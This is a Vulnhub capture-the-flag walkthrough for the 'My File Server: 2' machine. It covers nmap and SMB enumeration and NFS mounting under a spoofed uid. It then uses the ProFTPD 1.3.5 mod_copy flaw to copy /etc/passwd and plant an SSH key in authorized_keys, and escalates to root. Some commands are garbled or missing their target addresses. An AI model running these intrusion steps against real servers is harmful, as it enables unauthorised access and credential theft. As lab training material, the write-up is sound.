Scroll Top
577, Gold Plaza, Punjab Jewellers, M.G. Road, Opp. Treasure Island Mall

My File Server: 2 Walkthrough

My File Server:2 Walkthrough Vulnhub CTF

Download: My File Server: 2 Walkthrough Vulnhub CTF

I will share with you a new Walkthrough for Vulnhub machines. My File Server: 2 This CTF machine is Created by Akanksha Sachin Verma You can download here this CTF . I would call this box on the easy side but there are a lot of moving parts that can cause you to follow some different directions. I don’t want to say to much so let’s get at it.


Penetration Testing Methodologies

Network Scan

  • Netdicover
  • Nmap


  • Nikto
  • Telnet


  • Injecting via FTP
  • Spawn PTY shell
  • ProFTPd 1.3.5 – File Copy

Privilege Escalation

  • Capture the Flag.
  • Password
  • Kernel Exploit


Network Scanning

So, as we always start with netdiscover to get the IP of the VM machine and the IP of the host I’ve found is

netdiscover -i vboxnet1

Let’s proceed with network scan using Nmap aggressive scan as given below.

nmap -p- -A


It was very interesting as there were so many services running on the host network. We saw FTP’s “anonymous login enabled” and port 445 was also available for SMB.

In order to enumerate SMB and identify a username as “smbuser”, I use the following command.

smbmap -H
smbclient -L

So we used Nmap script for more enumeration

nmap --script smb-enum-shares.nse -p445

From the output of Nmap script scan, we came to know about the existence of “smbuser”. On login with smbclient with “smbuser” with password “smbuser”. But we don’t have write permission in it. On login with another smb share i.e. “smbdata”, we came to know that we have write permission in it. This can be helpful.

We also explore the IP host in the web browser as port 80 has been opened for the HTTP service.

I chose to run Nikto for HTTP weak config listing, and luckily found an entry for “readme.txt,” let’s test this in the web browser.

nikto -h

I chose to run nikto for HTTP weak config listing, and luckily found an entry for “readme.txt,” let’s test this in the web browser.

Since we have NFS service running on port 2069, we may be able to mount a share and find some juicy data! You’ll need to install nfs-common package if it doesn’t exist already. So I created a user by name of file2 and id @99

then I mounted the nfs share to /tmp/mnt as follows

useradd -u 99 file2
mkdir /tmp/mnt
mount -t nfs /tmp/mnt -nolock
cd /tmp/mnt/

We then, Moving forward to port number 2121, we found ProFTPD 1.3.5 which is vulnerable with “mod_copy” vulnerability using unauthenticated access.

so we give it a try and it was a success. Using this vulnerability, we can also cross-check the user by coping “passwd” into “/smbdata”.

telnet 2121
site help
cpfr /etc/passwd
cpto /smbdata/passwd_cpy


In order to get a shell, we will create a ssh key pair by running ssh-keygen.Put the public key i.e. “” to smb share “smbdata”.Copy the “authorized_keys” to “/home/smbuser/.ssh/” user “ProFTPD” Mod_copy Vulnerability.

Then copied the to mount position and transfer the key to /smbuser/.ssh/authorized_keys. Using ProFtpd 1.3.5 modcopy vulnerability on port 2121.

cp /root/.ssh/ /tmp/mnt
telnet 2121
site help
site cpfr /smbdata/
site cpto /home/smbuser/.ssh/authorized_keys

Now getting ssh connection with the key generated earlier

ssh -i id_rsa smbuser@
uname -a

YEHHH!!!!!!!! Got the shell.

Privilege Escalation

On enumerating, we found there are several ways to get the root like a vulnerable kernel but we have a password which we got before. So lets try this

su root
cat proof.txt
uname -a

OR we can go for a kernel exploit like before.

we transfer the exploit to the server and run exploit.


Comments (2)

Privilege escalation can also be done by ” sudo su – “

I think you got it wrong , as there is no sudo permission for smbuser:
>[smbuser@fileserver ~]$ sudo -l
>[sudo] password for smbuser:
>Sorry, user smbuser may not run sudo on fileserver.
>[smbuser@fileserver ~]$ sudo su
>[sudo] password for smbuser:
>smbuser is not in the sudoers file. This incident will be reported.
>[smbuser@fileserver ~]$ id && hostname
>uid=1000(smbuser) gid=1000(smbuser) groups=1000(smbuser)

Leave a comment

Send Comment

WhatsApp us